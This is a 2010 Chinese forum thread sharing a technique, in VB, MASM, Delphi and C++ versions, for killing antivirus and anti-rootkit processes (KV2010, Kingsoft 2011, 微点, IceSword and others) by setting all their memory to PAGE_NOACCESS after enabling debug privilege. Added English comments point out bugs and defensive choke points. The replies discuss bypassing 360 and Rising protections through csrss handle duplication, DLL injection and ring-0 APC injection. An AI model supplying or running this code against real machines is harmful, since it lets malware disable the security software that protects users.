[翻译+转载]无驱动杀死KV2010/金山2011/微点-1.2/冰刃/狙剑/天琊
本帖最后由 Tesla.Angela 于 2010-8-1 23:25 编辑
更新内容:
2010-7-21:发现这玩意还能杀死微点,我手头上测试的微点是2010年4月20日编译的(直接用以前下载的版本,没有下载最新版测试)。
2010-7-31:发现此程序无法结束瑞星2009!测试杀瑞星2010是在同学的机子上进行的,不排除他看到SSDT一片红,误以为是病毒干的,就拿冰刃把SSDT全恢复了。
首先感谢Zzzians(syf),提出了使用VirtualProtect破坏进程内存。
其次感谢他的朋友EXTREME,写了核心代码让我参考:http://hi.baidu.com/q_lai_a_qu/blog/item/fa92a982185ca7b26c81193a.html
'//////////////////////////////
'Code by Tesla.Angela(GDUT.HWL)
'Thank to Syf & q_lai_a_qu
'//////////////////////////////
Option Explicit
' Module-level declarations for a user-mode "memory-protection" process
' killer: the target is not terminated, every region of its address space
' is switched to PAGE_NOACCESS so that its next memory access faults.
' Defender notes grounded in this thread: the technique needs
' SeDebugPrivilege (enabled in Main) and an OpenProcess with
' PROCESS_VM_OPERATION on the victim; products that filter handle requests
' to their own processes (what the replies describe for 360/瑞星) stop it at
' that OpenProcess call, which is also the natural place to log/alert.
'
' Win32 SYSTEM_INFO as nine 32-bit fields (36 bytes). Only
' lpMinimumApplicationAddress, lpMaximumApplicationAddress and dwPageSize
' are read by VmpKillProcess. "dwNumberOrfProcessors" is a misspelling of
' the Win32 field dwNumberOfProcessors; VB user types are positional and
' the field is never referenced by name, so the layout is unaffected.
Private Type SYSTEM_INFO
dwOemID As Long
dwPageSize As Long
lpMinimumApplicationAddress As Long
lpMaximumApplicationAddress As Long
dwActiveProcessorMask As Long
dwNumberOrfProcessors As Long
dwProcessorType As Long
dwAllocationGranularity As Long
dwReserved As Long
End Type
' Win32 MEMORY_BASIC_INFORMATION for a 32-bit process: seven Longs =
' 28 bytes, the literal dwLength that VmpKillProcess passes to
' VirtualQueryEx.
Private Type MEMORY_BASIC_INFORMATION
BaseAddress As Long
AllocationBase As Long
AllocationProtect As Long
RegionSize As Long
State As Long
Protect As Long
lType As Long
End Type
' Undocumented ntdll export. The positional arguments a..d are
' (Privilege, Enable, CurrentThread, ByRef WasEnabled); Main passes
' privilege 20 = SE_DEBUG_PRIVILEGE, enable = 1, process token (0).
Private Declare Function RtlAdjustPrivilege Lib "ntdll" _
(ByVal a As Long, _
ByVal b As Long, _
ByVal c As Long, _
ByRef d As Long) As Long
' lpAddress is "As Any" so the caller can pass a raw Long with ByVal.
Private Declare Function VirtualQueryEx Lib "kernel32.dll" _
(ByVal hProcess As Long, _
ByRef lpAddress As Any, _
ByRef lpBuffer As MEMORY_BASIC_INFORMATION, _
ByVal dwLength As Long) As Long
Private Declare Function VirtualProtectEx Lib "kernel32.dll" _
(ByVal hProcess As Long, _
ByRef lpAddress As Any, _
ByVal dwSize As Long, _
ByVal flNewProtect As Long, _
ByRef lpflOldProtect As Long) As Long
Private Declare Function CloseHandle Lib "kernel32.dll" _
(ByVal hObject As Long) As Long
Private Declare Sub GetSystemInfo Lib "kernel32.dll" _
(ByRef lpSystemInfo As SYSTEM_INFO)
' NOTE(review): OpenProcess is called in VmpKillProcess but has no Declare
' anywhere in this listing, so under Option Explicit the module does not
' compile as posted.
' PROCESS_VM_READ is declared but unused in the VB version (the C++ version
' on this page uses it for its post-kill liveness check).
Private Const PROCESS_VM_READ As Long = (&H10)
Private Const PROCESS_VM_OPERATION As Long = (&H8)
Private Const PROCESS_QUERY_INFORMATION As Long = (&H400)
Private Const PAGE_NOACCESS As Long = &H1
' Makes every page of another process inaccessible so that the process
' faults on its next memory access (the "kill" is a crash, not a
' TerminateProcess). Walks the user-mode address range one page at a time
' and, for every address VirtualQueryEx can describe, sets the whole
' containing region to PAGE_NOACCESS.
'   PID: target process id, as entered in Main.
' Requires SeDebugPrivilege (enabled in Main) and
' PROCESS_VM_OPERATION Or PROCESS_QUERY_INFORMATION access. hProc is never
' checked: if OpenProcess is denied (e.g. by a product that filters handle
' requests to its own processes) every call below silently fails and the
' target is untouched.
' NOTE(review): the loop steps by page but VirtualProtectEx is applied to
' the whole region each time, so a region receives one call per page it
' spans; the C++ version on this page advances by RegionSize instead.
Private Sub VmpKillProcess(ByVal PID As Long)
Dim MaxAddr As Long, MinAddr As Long, CurAddr As Long, PageSize As Long, OldProtect As Long, hProc As Long
Dim SysInfo As SYSTEM_INFO
Dim MemBasicInfo As MEMORY_BASIC_INFORMATION
Call GetSystemInfo(SysInfo)
MinAddr = SysInfo.lpMinimumApplicationAddress
MaxAddr = SysInfo.lpMaximumApplicationAddress
PageSize = SysInfo.dwPageSize
' OpenProcess is not declared in this listing; return value unchecked.
hProc = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_QUERY_INFORMATION, False, PID)
For CurAddr = MinAddr To MaxAddr Step PageSize
' 28 = Len(MEMORY_BASIC_INFORMATION) in a 32-bit process.
If (VirtualQueryEx(hProc, ByVal CurAddr, MemBasicInfo, 28)) Then
' Return value ignored: regions the protection change fails on are
' simply skipped.
Call VirtualProtectEx(hProc, ByVal MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize, PAGE_NOACCESS, OldProtect)
End If
Next
Call CloseHandle(hProc)
End Sub
' Entry point: enables SeDebugPrivilege (privilege 20) on the process token
' through the undocumented RtlAdjustPrivilege, then prompts for a PID and
' hands it to VmpKillProcess. Both the return value and the ByRef
' "previous state" argument are discarded, so failure to obtain the
' privilege (a non-administrator caller) goes unreported and the later
' OpenProcess just fails. CLng raises a run-time error (type mismatch) if
' the InputBox is cancelled or the text is not numeric.
Public Sub Main()
RtlAdjustPrivilege 20, 1, 0, 0
Call VmpKillProcess(CLng(InputBox("PID=", "SyfKillProcess")))
End Sub
记住使用复制句柄的方式打开进程,以及要获得SE_DEBUG权限。
本帖最后由 Tesla.Angela 于 2010-8-1 23:30 编辑
顺便装一下B,贴出我翻译的ASM代码:
; MASM32 translation of the VB version above: 32-bit flat model, stdcall.
; SYSTEM_INFO, MEMORY_BASIC_INFORMATION, PAGE_NOACCESS and
; PROCESS_ALL_ACCESS come from windows.inc; OpenProcess, VirtualQueryEx,
; VirtualProtectEx, GetSystemInfo, CloseHandle, LoadLibrary and
; GetProcAddress from kernel32.inc.
.386
.model flat, stdcall
option casemap :none
include windows.inc
include user32.inc
include kernel32.inc
include masm32.inc
includelib user32.lib
includelib kernel32.lib
includelib masm32.lib
include macro.asm
.data
; Names used to resolve the undocumented RtlAdjustPrivilege at run time
; (it is not imported through an .inc/.lib pair).
NtDllDll db 'NTDLL.DLL',0
GetDebug db 'RtlAdjustPrivilege',0
.code
; Execution begins at START, i.e. at getp. Neither getp nor vpkp contains a
; ret, so control falls through getp -> vpkp -> the final ExitProcess.
START:
; getp: enables SeDebugPrivilege for the current process via the
; undocumented ntdll export RtlAdjustPrivilege, resolved by name at run
; time. The LoadLibrary / GetProcAddress results are not checked (a NULL
; pRtlAdjustPrivilege would be called), and the status returned in eax is
; discarded. There is no ret: execution falls through into vpkp, which
; immediately follows in .code (presumably getp's prologue frame is then
; still on the stack, only harmless because ExitProcess ends the process -
; confirm against the generated prologue/epilogue).
getp proc
local hNtdll:DWORD
local pRtlAdjustPrivilege:DWORD
local rtv:DWORD
invoke LoadLibrary,offset NtDllDll
mov hNtdll,eax
invoke GetProcAddress,hNtdll,offset GetDebug
mov pRtlAdjustPrivilege,eax
;RtlAdjustPrivilege(20,1,0,VarPtr(rtv))
; 20 = SE_DEBUG_PRIVILEGE, 1 = enable, 0 = adjust the process token (not
; just the current thread), rtv receives the previous enabled state.
; stdcall: arguments pushed right to left, callee cleans the stack.
lea eax,rtv
push eax
push 0
push 1
push 20
call pRtlAdjustPrivilege
getp endp
; vpkp: the page walk of VmpKillProcess. Steps from
; lpMinimumApplicationAddress to lpMaximumApplicationAddress one page at a
; time; for each address VirtualQueryEx can describe, the whole containing
; region is set to PAGE_NOACCESS so the target faults on its next access.
; Differences from the VB/C++ versions: the PID is hard-coded (8888), and
; the process is opened with PROCESS_ALL_ACCESS rather than the minimal
; PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION. hProc is not checked.
; ebx holds the loop bound; it is reloaded from MaxAddr at the end of every
; iteration, so the calls inside the loop need not preserve it. No ret:
; falls through to the ExitProcess invoke that follows the proc.
vpkp proc
local MaxAddr:DWORD
local MinAddr:DWORD
local CurAddr:DWORD
local PageSize:DWORD
local OldProtect:DWORD
local PID:DWORD
local hProc:DWORD
local VirtualQueryExRt:DWORD
local SysInfo:SYSTEM_INFO
local MemBasicInfo:MEMORY_BASIC_INFORMATION
mov eax,8888 ; PID of the process to be killed (hard-coded)
mov PID,eax
invoke GetSystemInfo,addr SysInfo
mov eax,SysInfo.lpMinimumApplicationAddress
mov MinAddr,eax
mov eax,MinAddr
mov CurAddr,eax
mov eax,SysInfo.lpMaximumApplicationAddress
mov MaxAddr,eax
mov ebx,MaxAddr
mov eax,SysInfo.dwPageSize
mov PageSize,eax
invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,PID
mov hProc,eax
.while CurAddr <= ebx
invoke VirtualQueryEx,hProc,CurAddr,addr MemBasicInfo,sizeof MEMORY_BASIC_INFORMATION
mov VirtualQueryExRt,eax
.if VirtualQueryExRt!=0
; Return value ignored; regions that refuse the change are skipped.
invoke VirtualProtectEx,hProc,MemBasicInfo.BaseAddress,MemBasicInfo.RegionSize,PAGE_NOACCESS,addr OldProtect
.endif
; CurAddr += PageSize (one call per page, even inside a large region)
mov ecx,CurAddr
mov edx,PageSize
add ecx,edx
mov CurAddr,ecx
mov ebx,MaxAddr
.endw
invoke CloseHandle,hProc
vpkp endp
; Reached by fall-through from vpkp (no ret in either proc); exit code 0
; regardless of whether any protection change succeeded.
invoke ExitProcess,0
end START
转载:9908006 写的Delphi版代码
// Delphi variant of the same technique. Walks the target's address space
// region by region from $100000 to $80000000 and sets every committed,
// writable region to PAGE_NOACCESS so the target faults on its next access.
// Unlike the VB/C++ versions it only touches regions whose Protect is
// exactly PAGE_READWRITE / PAGE_WRITECOPY / PAGE_EXECUTE_READWRITE /
// PAGE_EXECUTE_WRITECOPY (equality, so regions carrying modifier bits such
// as PAGE_GUARD are left alone) and it advances by RegionSize.
// fcopenprocess / myopenprocess are not defined on this page; presumably
// alternative ways of obtaining a handle when OpenProcess is denied (the
// post mentions duplicated handles) - confirm against the original source.
// If all three return 0 the loop simply never runs and closehandle(0) is
// called. Result is set to True unconditionally at the end, so the
// function never reports failure. The commented-out PMemoryRegion lines
// suggest this was adapted from a region-enumeration routine.
function GetMemoryRegion(pid: dword): Boolean;
var
TempStartAddress: DWord;
TempEndAddress: DWord;
OldProtect: dword;
ProcHandle: dword;
MBI: _MEMORY_BASIC_INFORMATION; // memory-region info buffer filled by VirtualQueryEx
begin
Result := False;
ProcHandle := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if ProcHandle = 0 then ProcHandle := fcopenprocess(pid);
if ProcHandle = 0 then ProcHandle := myopenprocess(pid);
TempStartAddress := 1 * 1024 * 1024; //$100000
TempEndAddress := 2 * 1024 * 1024; //$200000
TempEndAddress := TempEndAddress * 1024; //$80000000 (2 GB, the 32-bit user-mode ceiling)
// Stops at the first address VirtualQueryEx cannot describe or at the 2 GB bound.
while (VirtualQueryEx(ProcHandle,
pointer(TempStartAddress),
MBI,
sizeof(MBI)) > 0) and (TempStartAddress < TempEndAddress) do
begin
if (MBI.State = MEM_COMMIT) then
begin
if (MBI.Protect = PAGE_READWRITE) or
(MBI.Protect = PAGE_WRITECOPY) or
(MBI.Protect = PAGE_EXECUTE_READWRITE) or
(MBI.Protect = PAGE_EXECUTE_WRITECOPY)
then
begin
// Return value ignored; a refused change is silently skipped.
VirtualProtectEx(ProcHandle, MBI.BaseAddress, MBI.RegionSize, PAGE_NOACCESS, @OldProtect);
//PMemoryRegion.BaseAddress := Dword(MBI.BaseAddress);
//PMemoryRegion.MemorySize := MBI.RegionSize;
//Inc(MemoryRegionsIndex);
end;
end;
// Advance to the first page after the region just described.
TempStartAddress := Dword(MBI.BaseAddress) + MBI.RegionSize;
end;
closehandle(prochandle);
Result := True;
end;
转载:Q来A去写的原版c++代码
//
// Original C++ version of the technique the VB/ASM/Delphi listings above
// translate. Walks the user-mode address range of process PID and sets
// every region VirtualQueryEx can describe to PAGE_NOACCESS, so the target
// faults on its next memory access rather than being terminated.
//
// Returns TRUE when a follow-up OpenProcess(PROCESS_VM_READ) fails
// (taken to mean the process is gone), FALSE otherwise.
//
// Requires SeDebugPrivilege in the caller and PROCESS_VM_OPERATION |
// PROCESS_QUERY_INFORMATION on the target; hProc is not checked, so a
// denied OpenProcess (e.g. a product filtering handle requests to its own
// processes) makes every call fail silently and the result is then
// decided solely by the liveness check.
//
// NOTE(review): in the "dead" check below the OpenProcess handle is never
// stored (it leaks), and the CloseHandle inside that branch closes hProc a
// second time - hProc was already closed just before the check.
//
BOOL VPKillProc(DWORD PID)
{
DWORD MaxAddr;
DWORD CurAddr;
DWORD PageSize;
DWORD OldProtect;
HANDLE hProc;
SYSTEM_INFO SysInfo;
MEMORY_BASIC_INFORMATION MemBasicInfo;
GetSystemInfo(&SysInfo);
MaxAddr = (DWORD)SysInfo.lpMaximumApplicationAddress;
PageSize = SysInfo.dwPageSize;
hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, PID);
for (CurAddr = (DWORD)SysInfo.lpMinimumApplicationAddress; CurAddr <= MaxAddr; CurAddr += PageSize)
{
//
// Main loop: if the address is valid, make it unaccessible
//
if (VirtualQueryEx(hProc, (LPVOID)(CurAddr), &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION)))
{
// Return value ignored; regions that refuse the change are skipped.
VirtualProtectEx(hProc, MemBasicInfo.BaseAddress, MemBasicInfo.RegionSize, PAGE_NOACCESS, &OldProtect);
// Skip the rest of this region; the for-increment then adds one more
// page on top (unlike the VB version, which queries every page).
CurAddr += MemBasicInfo.RegionSize;
}
}
//
// Check if the process is dead
//
CloseHandle(hProc);
if (OpenProcess(PROCESS_VM_READ, FALSE, PID))
{
// Handle from the OpenProcess above is not closed; hProc is stale here.
CloseHandle(hProc);
return FALSE;
}
return TRUE;
}
我是前来膜拜的,哈哈!
看看。学习。
有点好奇,看下是什么
大出血啊,这玩艺杀不死瑞星,虚假广告!哈哈
不会吧?我记得瑞星是不允许复制句柄的,它学了360,不允许从csrss中复制任何句柄,有测试瑞星最新版的童鞋没?
当然,如果注入csrss,再xxxx,是可以的,但如果360和瑞星装在一起,就无法注入csrss了,狼与狈的组合啊
360tray.exe能杀死就好了...............
这个...这个...貌似在6个月前看过..
这个...这个...好像每次你发给我的说不要我发每次都会被你发出来...
强悍!~··········
膜拜膜拜
不会吧?这个代码能够Kill这么多的东东?!
膜拜ZZZians 不知道直接使用csrss里的句柄再加上这个VmpKillProcess能不能杀掉360。。。
naylon 发表于 2010-8-5 17:03
如果能注入到csrss并获得句柄,用这种方式杀360就不优美了。
优美的方式是插入dll,DllMain里来个DebugBreak,或者memcpy(3,2,1)。
本帖最后由 Tesla.Angela 于 2010-8-8 22:38 编辑
回复Tesla.Angela
好像在360启动之后没法插DLL吧?
naylon 发表于 2010-8-8 10:19
R3貌似是无法插入了,Ring0用APC插入应该还可以吧。
好資料 值得學習一下